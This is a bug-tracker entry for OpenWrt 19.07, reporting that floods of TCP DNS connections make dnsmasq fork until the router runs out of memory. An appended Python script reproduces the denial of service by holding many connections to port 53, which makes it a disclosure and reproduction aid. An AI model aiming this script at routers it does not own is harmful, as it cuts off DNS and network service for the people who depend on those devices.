OpenWrt/LEDE Project

  • Status Unconfirmed
  • Percent Complete
    0%
  • Task Type Bug Report
  • Category Base system
  • Assigned To No-one
  • Operating System All
  • Severity High
  • Priority Very Low
  • Reported Version openwrt-19.07
  • Due in Version Undecided
  • Due Date Undecided
  • Private
Attached to Project: OpenWrt/LEDE Project
Opened by Brian J. Murrell - 06.09.2021

FS#4011 - TCP queries to dnsmasq can cause OOM and DoS attack

Supply the following if possible:
- Device problem occurs on tplink,tl-wdr4300-v1
- Software versions of OpenWrt/LEDE release, packages, etc. 19.07.8
- Steps to reproduce

Use a tool like netcat to open many (i.e. 20+) TCP connections to port 53, simulating TCP DNS queries
Observe how dnsmasq forks for each connection
Observe how at some point enough dnsmasq children are running that the kernel starts OOMing

This is a quick/easy demonstration of how simply an OpenWRT router can be DoS attacked.

There is a hard-coded MAX_PROCS which defaults to 20. This clearly is too high for resource-constrained systems like OpenWRT routers.

There is a discussion of this problem on the dnsmasq ML @ https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2021q1/014907.html which includes a patch to make MAX_PROCS a run-time tunable. This could be used by OpenWRT to scale up/down the MAX_PROCS value based on the size of system it’s running on.

It could/should be user-overridable in case he/she knows better what the value should be than any attempt by OpenWRT to scale on a given router.
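
The reproduction described above, written out as a small Python helper. This is example code added for this page, not part of the bug report, dnsmasq or OpenWrt; the router address, connection count and hold time are assumptions passed on the command line, and the `ps` output it parses is a constructed sample, not a capture. It also builds a properly framed DNS-over-TCP query (2-byte length prefix, RFC 1035) so the held connections can optionally carry a real query instead of sitting idle.

```python
"""Hold many TCP connections to port 53 to reproduce the per-connection fork
in dnsmasq (FS#4011). Example code for this page, not dnsmasq/OpenWrt code.
Only run this against a router you own."""
import socket
import struct
import sys
import threading
import time


def build_tcp_dns_query(name, txid=0x1234):
    """Minimal A query for `name` framed for DNS over TCP: a 2-byte big-endian
    length prefix, then the RFC 1035 message (ID, flags=RD, QDCOUNT=1)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    question = qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    msg = header + question
    return struct.pack("!H", len(msg)) + msg


def open_idle_connections(host, port, count, timeout=3.0, query=None):
    """Open `count` TCP connections and keep them open. dnsmasq forks one child
    per accepted connection, so each held socket pins a child until its idle
    timeout. A successful connect() only proves the kernel completed the
    handshake: once dnsmasq stops accepting (MAX_PROCS reached) further
    connections queue in the listen backlog, so count children on the router
    (see count_dnsmasq_processes) rather than trusting this number alone."""
    socks = []
    for _ in range(count):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            if query is not None:
                s.sendall(query)  # child answers, then waits for more queries
        except OSError:
            s.close()
            break
        socks.append(s)
    return socks


def close_all(socks):
    for s in socks:
        try:
            s.close()
        except OSError:
            pass


def count_dnsmasq_processes(ps_output):
    """Count dnsmasq processes in BusyBox `ps` output captured on the router
    (e.g. `ps w | grep dnsmasq`). With one parent, children = result - 1."""
    return sum(1 for line in ps_output.splitlines()
               if "/usr/sbin/dnsmasq" in line and "grep" not in line)


# Constructed sample (assumption, not a real capture): parent plus two children.
SAMPLE_PS = """\
  PID USER       VSZ STAT COMMAND
 1801 dnsmasq   1164 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf.cfg01411c -k -x /var/run/dnsmasq/dnsmasq.cfg01411c.pid
 2410 dnsmasq   1164 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf.cfg01411c -k -x /var/run/dnsmasq/dnsmasq.cfg01411c.pid
 2411 dnsmasq   1164 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf.cfg01411c -k -x /var/run/dnsmasq/dnsmasq.cfg01411c.pid
 2415 root      1240 S    grep dnsmasq
"""


def local_listener_demo(count):
    """Offline check: throwaway TCP listener on 127.0.0.1; returns how many
    idle connections could be held against it at once."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(128)
    srv.settimeout(2.0)
    port = srv.getsockname()[1]
    accepted = []

    def serve():
        for _ in range(count):
            try:
                c, _ = srv.accept()
                accepted.append(c)
            except OSError:
                break

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    socks = open_idle_connections("127.0.0.1", port, count)
    t.join()
    held = len(socks)
    close_all(socks)
    close_all(accepted)
    srv.close()
    return held


if __name__ == "__main__":
    # Assumed defaults: router at 192.168.1.1, 25 connections, hold 30 seconds.
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    count = int(sys.argv[2]) if len(sys.argv) > 2 else 25
    hold = float(sys.argv[3]) if len(sys.argv) > 3 else 30.0
    socks = open_idle_connections(host, 53, count, query=build_tcp_dns_query("openwrt.org"))
    print(f"holding {len(socks)} of {count} connections to {host}:53 for {hold}s")
    time.sleep(hold)
    close_all(socks)
```

While the connections are held, run `ps w | grep dnsmasq` on the router and watch the child count climb toward MAX_PROCS; the OOM behaviour reported above is what happens when that many children do not fit in the router's RAM, so keep the count small on a device you still need.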
